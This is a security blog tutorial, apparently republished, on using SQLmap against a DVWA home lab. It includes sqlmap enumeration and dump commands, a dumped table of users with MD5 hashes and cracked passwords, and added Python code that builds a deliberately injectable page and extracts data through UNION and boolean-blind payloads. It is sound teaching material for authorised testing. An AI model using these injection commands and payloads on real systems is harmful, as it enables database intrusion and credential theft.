Mr Elite

Posted on • Originally published at securityelites.com

Kali Linux Day 7: SQLmap Tutorial (2026) — Automate SQL Injection Like a Pro 🔥


🔐 Authorised targets only. All SQLmap commands in this tutorial target DVWA in your own isolated home lab. SQLmap generates high-volume HTTP traffic that is clearly visible in server logs and to any IDS. Never run it against systems you don't own or aren't explicitly authorised in writing to test. Lab: Ethical Hacking Lab Setup.

180-DAY KALI LINUX COURSE: Day 7 of 180 (previous: Day 6, Nikto; next: Day 8, Wireshark)

Day 6 (Nikto) flagged a potential SQL injection endpoint. Day 7 teaches you to confirm it and pull every credential, every table, and every piece of data from the database in minutes. SQLmap automates what would take hours of manual UNION payload crafting; on a confirmed-vulnerable DVWA endpoint, a single three-command sequence goes from zero to a full credential dump in under 90 seconds. Understanding what it is doing beneath the surface is what separates a professional who can adapt when automation fails from one who is lost without it, and that is exactly what this SQLmap tutorial covers.

Day 7 covers SQLmap completely: installation, basic URL scanning, the full DVWA walkthrough, Burp Suite request files (the professional method), every important flag, POST form testing, and the command patterns you will use in every authorised web application assessment.

📋 What You’ll Master in Day 7

What Is SQLmap & How It Works

Install & Verify

Basic URL Scan

Full DVWA Walkthrough

Burp Request File (-r) Method

All Important Flags Explained

POST Forms & Authentication

Reading SQLmap Output

Reference Card

What Is SQLmap & How It Works

SQLmap is an open-source automated SQL injection detection and exploitation tool. It works by sending crafted HTTP requests to a target parameter, analysing the database’s response behaviour to determine whether injection is possible, then systematically extracting the database schema and data using the confirmed injection channel.

It detects six injection techniques automatically: boolean-based blind (true and false conditions produce different pages), time-based blind (injected delays reveal data bit by bit), error-based (database error messages leak data into the page), UNION query (a UNION SELECT appends attacker-chosen rows to the result), stacked queries (semicolon-separated extra statements), and out-of-band (data exfiltrated over a separate channel such as DNS). It supports MySQL, PostgreSQL, Microsoft SQL Server, Oracle, SQLite, and 20+ other database systems.

📚 Manual first, always. The professional workflow is: (1) confirm the injection manually in Burp Repeater with a single quote (does the page error?) and a boolean condition (do `AND 1=1` and `AND 1=2` return different pages?), (2) hand the confirmed parameter to SQLmap for systematic extraction. Confirming by hand rules out false positives before you generate thousands of requests. See: SQL Injection Tutorial Step-by-Step and DVWA Day 4: SQL Injection.

Install & Verify SQLmap on Kali Linux

Pre-installed on Kali Linux. Verify:

sqlmap --version
1.8.#stable — https://sqlmap.org

Update to the latest version: sqlmap --update

Install if missing: sudo apt install sqlmap -y

View all options: sqlmap -hh   # full help (-h shows the short help)

Basic URL Scan — Your First SQLmap Commands

─── Basic GET parameter scan ────────────────────────────────────

sqlmap -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
       --cookie="PHPSESSID=abc123; security=low" --batch

SQLmap tests the 'id' parameter (and 'Submit') and reports the injection type(s) it found. The cookie matters: PHPSESSID must be the session of a browser that is already logged in to DVWA, and security=low selects the unprotected version of the page. Without a valid session DVWA redirects to its login form and SQLmap ends up testing that instead.

─── List all databases ──────────────────────────────────────────

sqlmap -u "…?id=1&Submit=Submit" --cookie="…" --dbs --batch

available databases [2]:
[*] dvwa
[*] information_schema

Full DVWA Walkthrough — Zero to Credential Dump

The complete command sequence that takes you from detecting an injection to extracting usernames and password hashes: three commands in the terminal capture below (--dbs, --tables, --dump), plus an optional --columns step to inspect the schema before dumping. All commands target DVWA in your authorised home lab.


Kali Linux — SQLmap Full DVWA Extraction (Authorised Home Lab)

STEP 1: Enumerate databases

└─$ sqlmap -r dvwa_sqli.txt --dbs --batch
[*] dvwa
[*] information_schema

STEP 2: List tables in dvwa

└─$ sqlmap -r dvwa_sqli.txt -D dvwa --tables --batch
[*] guestbook
[*] users

STEP 3: Dump users table

└─$ sqlmap -r dvwa_sqli.txt -D dvwa -T users --dump --batch

+----+-------+----------------------------------+
| id | user  | password (MD5)                   |
+----+-------+----------------------------------+
| 1  | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 2  | gordo | e99a18c428cb38d5f260853678922e03 |
| 3  | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 |
+----+-------+----------------------------------+
→ Crack with John the Ripper (Day 5): admin=password, gordo=abc123, pablo=letmein

SQLmap full DVWA extraction using a -r Burp request file, three commands in sequence: --dbs (discover databases), -D dvwa --tables (list tables), -D dvwa -T users --dump (extract all rows). Result: three usernames and MD5 password hashes extracted in under 90 seconds. The hashes feed directly into John the Ripper (Day 5) for offline cracking. This is the complete database compromise path in an authorised lab assessment.

─── Complete 4-command extraction sequence ──────────────────────

1. Detect injection + enumerate databases
   sqlmap -r dvwa_sqli.txt --dbs --batch

2. List tables in target database
   sqlmap -r dvwa_sqli.txt -D dvwa --tables --batch

3. List columns in users table
   sqlmap -r dvwa_sqli.txt -D dvwa -T users --columns --batch

4. Dump the entire users table
   sqlmap -r dvwa_sqli.txt -D dvwa -T users --dump --batch
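What SQLmap is actually doing during that sequence, and during the "manual first" confirmation step earlier, is easy to lose behind the --batch flag. The following is an added example written for this page (it is not code from the article and not sqlmap's own code): a miniature DVWA-style page backed by an in-memory SQLite database, with the id parameter concatenated into the query exactly as DVWA's low-security page does it, followed by the work the tool automates against it: confirming injection with a quote and a boolean pair, enumerating tables and columns and dumping rows over a UNION, and extracting a value blind, one character at a time, when no data channel exists. The users, hashes and the VulnerableApp class are constructed for the example; SQLite's sqlite_master and pragma_table_info stand in for MySQL's information_schema (same idea, different catalogue tables), so the payloads differ in detail from what SQLmap sends to a real MySQL backend.

```python
"""Added example: a DVWA-like vulnerable page plus the three things sqlmap
automates against it (confirm, UNION-enumerate, blind-extract).
Not from the original article and not sqlmap code; SQLite stands in for MySQL."""
import hashlib
import re
import sqlite3

# Constructed seed data modelled on DVWA: unsalted MD5 passwords, as DVWA stores them.
SEED_USERS = [(1, "admin", "admin", "admin", "password"),
              (2, "Gordon", "Brown", "gordo", "abc123"),
              (3, "Pablo", "Picasso", "pablo", "letmein")]
ROW_RE = re.compile(r"First name: (.*?)<br />Surname: (.*?)</pre>")


class VulnerableApp:
    """DVWA 'low' security: the id parameter is concatenated straight into SQL."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript(
            "CREATE TABLE users(user_id INTEGER, first_name TEXT, last_name TEXT,"
            " user TEXT, password TEXT);"
            "CREATE TABLE guestbook(comment_id INTEGER, comment TEXT);")
        self.db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)",
                            [(i, f, l, u, hashlib.md5(p.encode()).hexdigest())
                             for i, f, l, u, p in SEED_USERS])
        self.requests = 0  # every page() call is one HTTP request sqlmap would send

    def page(self, user_id: str) -> str:
        self.requests += 1
        # Deliberately vulnerable: string formatting instead of a bound parameter.
        sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
        try:
            rows = self.db.execute(sql).fetchall()
        except sqlite3.Error as exc:  # error-based channel: the DB error reaches the page
            return f"SQL error: {exc}"
        return "".join(f"<pre>First name: {a}<br />Surname: {b}</pre>" for a, b in rows)


def confirm_injection(app: VulnerableApp, param: str = "1") -> bool:
    """Manual step: a stray quote breaks the query, and two boolean conditions
    that differ only in truth value produce different pages."""
    broken = app.page(param + "'").startswith("SQL error")
    return broken and app.page(f"{param}' AND '1'='1") != app.page(f"{param}' AND '1'='2")


def union_query(app: VulnerableApp, select: str) -> list:
    """UNION channel: append our SELECT to the two-column query and read it off the page.
    'x' matches no real row, so only the injected rows come back; '-- ' eats the closing quote."""
    return sorted(ROW_RE.findall(app.page(f"x' UNION SELECT {select} -- ")))


def enumerate_tables(app: VulnerableApp) -> list:  # --tables
    return [name for name, _ in union_query(app, "name, type FROM sqlite_master WHERE type = 'table'")]


def enumerate_columns(app: VulnerableApp, table: str) -> list:  # --columns
    return [name for name, _ in union_query(app, f"name, type FROM pragma_table_info('{table}')")]


def dump(app: VulnerableApp, table: str, col_a: str, col_b: str) -> list:  # --dump
    return union_query(app, f"{col_a}, {col_b} FROM {table}")


def blind_extract(app: VulnerableApp, subquery: str, max_len: int = 64) -> str:
    """Boolean-based blind channel: the page never shows the value, only whether the
    injected condition held. Binary-search each character's code point (7 requests
    per character); this is the fallback when UNION and error channels are unavailable."""
    truthy = app.page("1' AND '1'='1")
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"1' AND unicode(substr(({subquery}), {pos}, 1)) > {mid} AND '1'='1"
            if app.page(probe) == truthy:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end of the string: unicode('') is NULL, so no probe is ever true
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    app = VulnerableApp()
    print("injectable:", confirm_injection(app))
    print("tables:", enumerate_tables(app))
    print("columns:", enumerate_columns(app, "users"))
    print("dump:", dump(app, "users", "user", "password"))
    print("blind:", blind_extract(app, "SELECT password FROM users WHERE user = 'admin'"))
    print("requests sent:", app.requests)
```

Run it and compare the request counter: the whole UNION path (confirm, tables, columns, dump) costs six requests, while pulling one 32-character hash blind costs well over two hundred. That gap is why SQLmap prefers UNION and error-based channels when it finds them, why a blind dump of a large table takes so long, and why the warning at the top about traffic volume in server logs is not theoretical.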

Burp Suite Request File (-r) — The Professional Method
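The dvwa_sqli.txt file used in the walkthrough is simply the raw HTTP request as Burp saves it (right-click the request, "Copy to file"), and SQLmap takes the target URL, the Host, the Cookie header and the body from that file, which is why no --cookie flag appears in the -r commands above. The example below is added for this page (it is not SQLmap's own request parser): two constructed request files matching the DVWA lab, one GET and one POST login, and a small parser that recovers the parameters SQLmap would test from each. The parser assumes plain http, as SQLmap does unless you pass --force-ssl; by default SQLmap tests GET and POST parameters, and adds Cookie values only at --level 2 or higher.

```python
"""Added example: what a saved Burp request file contains and how the injectable
parameters sqlmap tests with -r are recovered from it. Not sqlmap's own parser."""
from urllib.parse import parse_qsl, urlsplit

# Constructed: the DVWA request as Burp's "Copy to file" would save it.
DVWA_SQLI_TXT = """GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0
Cookie: PHPSESSID=abc123; security=low
Connection: close

"""

# Constructed: a POST form (the DVWA login) for the POST-body case.
LOGIN_POST_TXT = """POST /dvwa/login.php HTTP/1.1
Host: 192.168.56.101
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

username=admin&password=password&Login=Login"""


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, URL, headers, cookies, body and
    the (place, name) -> value map of GET and POST parameters."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split()
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = f"http://{headers['host']}{path}"  # assumption: http unless --force-ssl
    query = urlsplit(url).query
    params = {("GET", k): v for k, v in parse_qsl(query, keep_blank_values=True)}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params.update({("POST", k): v for k, v in parse_qsl(body.strip(), keep_blank_values=True)})
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            cookies[k] = v
    return {"method": method, "url": url, "headers": headers,
            "params": params, "cookies": cookies, "body": body.strip()}


def injectable_parameters(req: dict, level: int = 1) -> list:
    """Parameters sqlmap would test for this request: GET and POST at the default
    level; cookie values join them at --level 2 or higher."""
    names = [f"{place}:{name}" for place, name in req["params"]]
    if level >= 2:
        names += [f"Cookie:{name}" for name in req["cookies"]]
    return names


if __name__ == "__main__":
    for raw in (DVWA_SQLI_TXT, LOGIN_POST_TXT):
        req = parse_request(raw)
        print(req["method"], req["url"])
        print("  level 1:", injectable_parameters(req))
        print("  level 2:", injectable_parameters(req, level=2))
```

Two practical consequences follow from the file format. The PHPSESSID inside the file expires with the DVWA session, so a stale request file silently turns every scan into a scan of the login page; re-save the request when you see SQLmap complaining that the target is not injectable. And because every GET and POST parameter in the file is a candidate, use -p id when you already know which parameter is vulnerable, so the tool does not spend requests on Submit.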

📖 Read the complete guide on SecurityElites; the article continues there with the remaining sections.